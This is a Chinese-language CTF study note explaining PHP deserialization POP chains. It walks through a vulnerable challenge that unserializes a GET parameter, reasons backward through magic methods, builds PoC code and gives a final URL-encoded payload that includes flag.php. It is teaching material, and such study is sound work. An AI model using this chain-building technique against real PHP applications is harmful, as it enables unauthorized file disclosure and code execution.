网站建设kpi考核wordpress移动端编辑器

关注这个专栏的其他相关笔记：[Web 安全] 反序列化漏洞 - 学习笔记-CSDN博客

0x01：什么是 POP 链？

POP 链（Payload On Purpose Chain）是一种利用 PHP 中的魔法方法进行多次跳转以获取敏感数据的技术。它通常出现在 CTF 比赛中，并且与反序列化一起考察。

POP 链可以理解为反序列化的一种拓展，涉及到的魔法方法更多，泛用性更强。

0x02：POP 链 — 入门基础

POP 链，简单来说，就是把一个对象的成员属性赋值为新的对象。比如下面这个例子：

 <?php​class Node {public $nodeData;         // 用来存储节点数据public $nextNode = null;  // 用来存储下一个节点对象}​​$node1 = new Node();$node1 -> nodeData = "[ 1 ] 号节点";​$node1 -> nextNode = new Node();$node1 -> nextNode -> nodeData = "[ 2 ] 号节点";​echo serialize($node1);// 输出结果如下: // O:4:"Node":2:{s:8:"nodeData";s:15:"[ 1 ] 号节点";s:8:"nextNode";O:4:"Node":2:{s:8:"nodeData";s:15:"[ 2 ] 号节点";s:8:"nextNode";N;}}

上面是笔者创建的一个简单的节点类，该类有两个属性，$nodeData 用来存储数据，$nextNode 用来指向下一个节点。

观察一下这个 $node1 序列化后的结果，我们可以很轻易的看到，对象中包含了对象的这么一个结构，这就是 POP 链。在后面做 CTF 时，我们就需要手动构造这么一串东西来尝试过关。

0x03：POP 链 — 构造思路

接下来，笔者以一个 CTF 的题目作为示范，来演示一下 POP 链的构造思路，下面是题目的整体源码：

 <?php​highlight_file(__FILE__);​class Modifier {private $var;public function append($value) {include($value);   // Flag Is in the flag.phpecho $flag;}​public function __invoke() {$this->append($this->var);}}​class Show {public $source;public $str;public function __toString() {return $this->str->source;}public function __wakeup() {echo $this->source;}}​class Test{public $p;public function __construct() {$this->p = array();}// 不存在的属性public function __get($key) {$function = $this->p;return $function();}}​// pop序列化的值if (isset($_GET['pop'])) {unserialize($_GET['pop']);}

我们的目标就是，尝试包含 flag.php 并读取到 flag。

下面我们就要开始分析了，笔者比较喜欢进行反向逆推的，首先确定我们最终要达成的目标：

1. 确定目标：要执行 Modifier::append($value) 且 $value=flag.php。

2. 问：谁能跳到 Modifier::append($value)？

   答：Modifier::__invoke() 且要求 Modifier 对象的 $var 属性为 flag.php。

3. 问：谁能跳到 Modifier::__invoke()？=> 哪里能将 Modifier 对象当方法调用？

   答：Test::__get($key) 且当 Test 对象的 $p 属性为 Modifier 对象时满足要求。

4. 问：谁能跳到 Test::__get($key)？=> 哪里可能会访问某个对象的不存在的属性？

   答：Show::__toString() 且当 Show 对象的 $str 属性为 Test 对象时满足要求。

5. 问：谁能跳到 Show::__toString() ？即哪里会把 Show 对象当作字符串处理？

   答：Show::__wakeup()且当 Show 对象的 $source 属性为 Show 对象时满足要求。

6. 问：哪里能触发 Show::__wakeup() ？

   答：反序列化 Show 对象。

如上，逆向推导结束，最终我们定格到了 Show::__wakeup() 方法上，即反序列化执行时，会自然触发的一个方法上。

下面开始编写 POC，POC 的编写其实就是根据答案反着来，着重关注 ”且当“ 后面的条件：

 // 1. 反序列化 Show 对象 => 创建一个 Show() 对象$poc = new Show();// 2. 赋予 Show() 对象的 $source 属性为 Show() 对象。$poc -> source = new Show();// 3. 赋予 Show() 对象的 $str 属性为 Test 对象。$poc -> source -> str = new Test();// 4. 赋予 Test 对象的 $p 属性为 Modifier 对象。$poc -> source -> str -> p = new Modifier();​// 5. 赋予 Modifier 对象的 $var 属性值为 flag.php。$poc -> source -> str -> p = "flag.php";​echo serialize($poc); 

上面的 POC 其实整体流程是对的，但是有个细节，关注一下 Modifier 类中的 $p 属性：

 class Modifier {private $var;}

如上，它是一个私有属性，私有属性我们是不能直接通过属性赋值的。但是我们知道，反序列化的特性，反序列化生成的对象成员属性值是由被反序列化的字符串决定的，与原来类中预定义的值无关。 那么基于此特性，虽然直接赋值不行，但是我们可以修改 Modifier 类中 $var 的默认值呀。

所以正确的最终 POC 局部如下（下面都是我们修改的主要部分）：

 class Modifier {// 5. 赋予 Modifier 对象的 $var 属性值为 flag.php。private $var = "flag.php";public function append($value) {include($value);   // Flag Is in the flag.phpecho $flag;}​public function __invoke() {$this->append($this->var);}}​// 1. 反序列化 Show 对象 => 创建一个 Show() 对象$poc = new Show();// 2. 赋予 Show() 对象的 $source 属性为 Show() 对象。$poc -> source = new Show();// 3. 赋予 Show() 对象的 $str 属性为 Test 对象。$poc -> source -> str = new Test();// 4. 赋予 Test 对象的 $p 属性为 Modifier 对象。$poc -> source -> str -> p = new Modifier();​echo serialize($poc); 

同时我们注意到，反序列化中带有 private 私有属性，且目标是通过 GET 请求接收传参的，所以为了防止我们复制 POC 的时候出现 Bug，我们还需要对最终序列化的结果进行一个 URL 编码（服务端在接收的时候其实默认会进行一次 URL 解码，所以不用慌），以确定没有漏复制任何值，所以最终 POC 如下：

 <?php​// highlight_file(__FILE__);​class Modifier {// 5. 赋予 Modifier 对象的 $var 属性值为 flag.php。private $var = "flag.php";public function append($value) {include($value);   // Flag Is in the flag.phpecho $flag;}​public function __invoke() {$this->append($this->var);}}​class Show {public $source;public $str;public function __toString() {return $this->str->source;}public function __wakeup() {echo $this->source;}}​class Test{public $p;public function __construct() {$this->p = array();}// 不存在的属性public function __get($key) {$function = $this->p;print_r($function);return $function();}}​// 1. 反序列化 Show 对象 => 创建一个 Show() 对象$poc = new Show();// 2. 赋予 Show() 对象的 $source 属性为 Show() 对象。$poc -> source = new Show();// 3. 赋予 Show() 对象的 $str 属性为 Test 对象。$poc -> source -> str = new Test();// 4. 赋予 Test 对象的 $p 属性为 Modifier 对象。$poc -> source -> str -> p = new Modifier();​echo urlencode(serialize($poc));

最终 Payload 如下：

 O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A13%3A%22%00Modifier%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D